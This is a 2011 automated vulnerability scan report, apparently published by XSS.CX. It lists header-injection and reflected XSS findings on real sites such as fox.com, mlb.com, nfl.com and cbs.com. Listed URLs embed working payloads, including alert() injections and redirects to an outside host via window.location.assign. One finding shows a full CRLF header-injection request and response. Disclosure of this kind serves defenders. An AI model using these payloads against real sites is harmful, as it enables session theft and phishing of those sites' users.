XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10022011-01

Report generated by XSS.CX at Sun Oct 02 18:45:11 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. HTTP header injection

1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [crtp parameter]

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]

1.3. http://1c6e2.v.fwmrm.net/ad/l/1 [cr parameter]

1.4. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.5. http://dw.com.com/clear/c.gif [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]

2.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]

2.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]

2.4. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]

2.5. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

2.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

2.7. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]

2.8. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]

2.9. http://a.abc.com/service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css [REST URL parameter 5]

2.10. http://a.abc.com/service/gremlin/css/files/home-page,generic,featured-start.css [REST URL parameter 5]

2.11. http://a.abc.com/service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.css [REST URL parameter 5]

2.12. http://a.abc.com/service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js [REST URL parameter 5]

2.13. http://a.abc.com/service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]

2.14. http://a.abc.com/service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js [REST URL parameter 5]

2.15. http://abc.go.com/ [name of an arbitrarily supplied request parameter]

2.16. http://ad.turn.com/server/bid/fan.bid [requestId parameter]

2.17. http://ad.yieldmanager.com/getbid [callback parameter]

2.18. http://ad.yieldmanager.com/getbid [u parameter]

2.19. http://adnxs.revsci.net/imp [Z parameter]

2.20. http://adnxs.revsci.net/imp [s parameter]

2.21. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

2.22. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

2.23. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

2.24. http://ads.pointroll.com/PortalServe/ [flash parameter]

2.25. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.26. http://ads.pointroll.com/PortalServe/ [time parameter]

2.27. http://amch.questionmarket.com/adscgen/popup.php [type parameter]

2.28. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.29. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.30. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.31. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.32. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.33. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.34. http://cdn.krxd.net/config/ [site parameter]

2.35. http://choices.truste.com/ca [c parameter]

2.36. http://choices.truste.com/ca [cid parameter]

2.37. http://choices.truste.com/ca [plc parameter]

2.38. http://fim.adnxs.com/fpt [callback parameter]

2.39. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 2]

2.40. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 3]

2.41. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 4]

2.42. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 5]

2.43. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [aid parameter]

2.44. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [c parameter]

2.45. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [cid parameter]

2.46. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [h parameter]

2.47. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [js parameter]

2.48. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [name of an arbitrarily supplied request parameter]

2.49. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [pid parameter]

2.50. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [plc parameter]

2.51. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [w parameter]

2.52. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 2]

2.53. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 3]

2.54. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 4]

2.55. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 5]

2.56. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 6]

2.57. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 7]

2.58. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [name of an arbitrarily supplied request parameter]

2.59. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [sz parameter]

2.60. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 2]

2.61. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 3]

2.62. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 4]

2.63. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 5]

2.64. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 6]

2.65. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [REST URL parameter 7]

2.66. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [name of an arbitrarily supplied request parameter]

2.67. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [sz parameter]

2.68. http://guru.sitescout.com/tag.jsp [h parameter]

2.69. http://guru.sitescout.com/tag.jsp [pid parameter]

2.70. http://guru.sitescout.com/tag.jsp [w parameter]

2.71. http://js.revsci.net/gateway/gw.js [csid parameter]

2.72. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [REST URL parameter 1]

2.73. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [feed parameter]

2.74. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [format parameter]

2.75. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [height parameter]

2.76. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [width parameter]

2.77. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_/tracker.log [REST URL parameter 1]

2.78. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

2.79. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

2.80. http://mads.cbs.com/mac-ad [BRAND parameter]

2.81. http://mads.cbs.com/mac-ad [BRAND parameter]

2.82. http://mads.cbs.com/mac-ad [BRAND parameter]

2.83. http://mads.cbs.com/mac-ad [BRAND parameter]

2.84. http://mads.cbs.com/mac-ad [CELT parameter]

2.85. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

2.86. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

2.87. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

2.88. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

2.89. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

2.90. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

2.91. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

2.92. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

2.93. http://mads.cbs.com/mac-ad [META&ADSEPARATOR parameter]

2.94. http://mads.cbs.com/mac-ad [NCAT parameter]

2.95. http://mads.cbs.com/mac-ad [NCAT parameter]

2.96. http://mads.cbs.com/mac-ad [NODE parameter]

2.97. http://mads.cbs.com/mac-ad [NODE parameter]

2.98. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

2.99. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

2.100. http://mads.cbs.com/mac-ad [POS parameter]

2.101. http://mads.cbs.com/mac-ad [PTYPE parameter]

2.102. http://mads.cbs.com/mac-ad [PTYPE parameter]

2.103. http://mads.cbs.com/mac-ad [SITE parameter]

2.104. http://mads.cbs.com/mac-ad [cookiesOn parameter]

2.105. http://mads.cbs.com/mac-ad [cookiesOn parameter]

2.106. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

2.107. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

2.108. http://mads.cbs.com/mac-ad [x-cb parameter]

2.109. http://mads.cbs.com/mac-ad [x-cb parameter]

2.110. http://mlb.mlb.com/account/quick_login_hdr.jsp [successRedirect parameter]

2.111. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

2.112. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [game_type parameter]

2.113. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [results parameter]

2.114. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [season parameter]

2.115. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [game_type parameter]

2.116. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [results parameter]

2.117. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [season parameter]

2.118. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [game_type parameter]

2.119. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [season parameter]

2.120. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [sport_code parameter]

2.121. http://mlb.mlb.com/lookup/json/named.properties_season_splits.bam [season parameter]

2.122. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [game_type parameter]

2.123. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [season parameter]

2.124. http://mlb.mlb.com/lookup/json/named.schedule_series.bam [sport_code parameter]

2.125. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [all_star_sw parameter]

2.126. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [season parameter]

2.127. http://mlb.mlb.com/lookup/json/named.team_all_season.bam [sport_code parameter]

2.128. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [org_id parameter]

2.129. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [season parameter]

2.130. http://mlb.mlb.com/lookup/named.properties_info_events_season.bam [sport_code parameter]

2.131. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [league_id parameter]

2.132. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [season parameter]

2.133. http://mlb.mlb.com/lookup/named.standings_all_league_repeater.bam [sit_code parameter]

2.134. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [league_id parameter]

2.135. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [results parameter]

2.136. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [season parameter]

2.137. http://mlb.mlb.com/lookup/named.standings_wild_card_league_repeater.bam [sit_code parameter]

2.138. http://mlb.mlb.com/mlb/schedule/ [name of an arbitrarily supplied request parameter]

2.139. http://mlb.mlb.com/mlb/schedule/ [tcid parameter]

2.140. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [game_type parameter]

2.141. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [results parameter]

2.142. http://mlb.mlb.com/pubajax/wf/flow/stats.splayer [season parameter]

2.143. http://mlb.mlb.com/stats/sortable.jsp [c_id parameter]

2.144. http://mlb.mlb.com/stats/sortable.jsp [name of an arbitrarily supplied request parameter]

2.145. http://mlb.mlb.com/stats/sortable.jsp [tcid parameter]

2.146. http://mlb.mlb.com/style/nav_2011.jsp [section parameter]

2.147. http://pluck.nfl.com/ver1.0/Direct/Jsonp [cb parameter]

2.148. http://pluck.nfl.com/ver1.0/daapi2.api [cb parameter]

2.149. http://pluck.nfl.com/ver1.0/daapi2.api [ctk parameter]

2.150. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

2.151. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

2.152. http://rtb.media6degrees.com/adserv/FanBidHandler [callback parameter]

2.153. https://secure.mlb.com/style/nav_2011.jsp [section parameter]

2.154. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

2.155. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

2.156. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317595850600&ASTPCT parameter]

2.157. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317596177473&ASTPCT parameter]

2.158. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [1317596233240&ASTPCT parameter]

2.159. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [name of an arbitrarily supplied request parameter]

2.160. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [1317596233240&ASTPCT parameter]

2.161. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [1317596233240&ASTPCT parameter]

2.162. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [name of an arbitrarily supplied request parameter]

2.163. http://www.fox.com/_ajax/tooltip.php [REST URL parameter 1]

2.164. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 1]

2.165. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 2]

2.166. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 3]

2.167. http://www.fox.com/_app/components/auth-1.0/mvpds.xml [REST URL parameter 4]

2.168. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-02.xml [REST URL parameter 1]

2.169. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-02.xml [REST URL parameter 2]

2.170. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 1]

2.171. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 2]

2.172. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-2.xml [REST URL parameter 3]

2.173. http://www.fox.com/_ui/css/combinedcss.php [REST URL parameter 1]

2.174. http://www.fox.com/_ui/css/combinedcss.php [REST URL parameter 2]

2.175. http://www.fox.com/_ui/flash/EditorialPod.swf [REST URL parameter 1]

2.176. http://www.fox.com/_ui/flash/EditorialPod.swf [REST URL parameter 2]

2.177. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]

2.178. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]

2.179. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]

2.180. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]

2.181. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]

2.182. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]

2.183. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]

2.184. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]

2.185. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]

2.186. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]

2.187. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]

2.188. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]

2.189. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]

2.190. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]

2.191. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]

2.192. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 1]

2.193. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 2]

2.194. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 3]

2.195. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 1]

2.196. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 2]

2.197. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 3]

2.198. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]

2.199. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]

2.200. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]

2.201. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]

2.202. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]

2.203. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]

2.204. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]

2.205. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]

2.206. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]

2.207. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]

2.208. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]

2.209. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]

2.210. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 1]

2.211. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 2]

2.212. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 3]

2.213. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]

2.214. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]

2.215. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 1]

2.216. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 2]

2.217. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 3]

2.218. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]

2.219. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 1]

2.220. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 2]

2.221. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 4]

2.222. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]

2.223. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 1]

2.224. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 2]

2.225. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 5]

2.226. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]

2.227. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]

2.228. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]

2.229. http://www.fox.com/_ui/js/fox_homepage_vars.php [REST URL parameter 1]

2.230. http://www.fox.com/_ui/js/fox_homepage_vars.php [REST URL parameter 2]

2.231. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 1]

2.232. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 2]

2.233. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 3]

2.234. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 1]

2.235. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 2]

2.236. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 4]

2.237. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 1]

2.238. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 2]

2.239. http://www.fox.com/_ui82a36%22-alert(1)-%228535eeb0e17/fox_player/swf/flvPlayer.swf [REST URL parameter 3]

2.240. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]

2.241. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

2.242. http://www.nfl.com/polls/vote [skin parameter]

2.243. http://www.nhl.com/geo/cm/68/HomePage/1 [REST URL parameter 4]

2.244. http://www.nhl.com/geo/cm/68/MediumRail/6 [REST URL parameter 4]

2.245. http://www.nhl.com/geo/cm/68/MediumRail/7 [REST URL parameter 4]

2.246. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/1 [REST URL parameter 4]

2.247. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/13 [REST URL parameter 4]

2.248. http://www.nhl.com/geo/cm/68/Microsite-NHLNetwork/22 [REST URL parameter 4]

2.249. http://www.nhl.com/geo/cm/68/PageWrapper/7 [REST URL parameter 4]

2.250. http://www.nhl.com/geo/cm/68/Schedule/1 [REST URL parameter 4]

2.251. http://adnxs.revsci.net/imp [Referer HTTP header]

2.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [Referer HTTP header]

2.253. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [Referer HTTP header]

2.254. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [Referer HTTP header]

2.255. http://myspace.com/ [name of an arbitrarily supplied request parameter]

2.256. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

2.257. http://www.nbc.com/assets/esp/social/Identity/getLoginRegV3Global/.html [REST URL parameter 4]

2.258. http://www.nbc.com/assets/esp/social/Identity/getLoginRegV3Global/.html [REST URL parameter 4]



1. HTTP header injection  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [crtp parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the crtp request parameter is copied into the X-FW-Error-Info response header. The payload 409f0%0d%0a5b4a6ad39e3 was submitted in the crtp parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=187370371771976350&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=409f0%0d%0a5b4a6ad39e3&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b035_5659033979904096480";expires=Mon, 01 Oct 2012 23:02:28 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596496.0,5.1317596494.0,20487.1317596494.0,20499.1317596496.0,^";expires=Tue, 01 Nov 2011 23:02:28 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596548.187370371771976350.255138~544603~654718~655005~664977~,1317596534.438724.273825~,1317596532.438724".273825~,1317596531.438724
Set-Cookie: _vr="1317596538.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:02:28 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596497.588.1.1,";expires=Tue, 01 Nov 2011 23:02:28 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596548.28800.0.174,";expires=Tue, 01 Nov 2011 23:02:28 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Tue, 01 Nov 2011 23:02:28 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
X-FW-Error-Info: STYLESHEET 409f0
5b4a6ad39e3
NOT FOUND
Content-Type: text/xml
Content-Length: 0
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:02:27 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the pvrn request parameter is copied into the Set-Cookie response header. The payload d0907%0d%0a2a6cd9637fb was submitted in the pvrn parameter. This caused a response containing an injected HTTP header.

Request

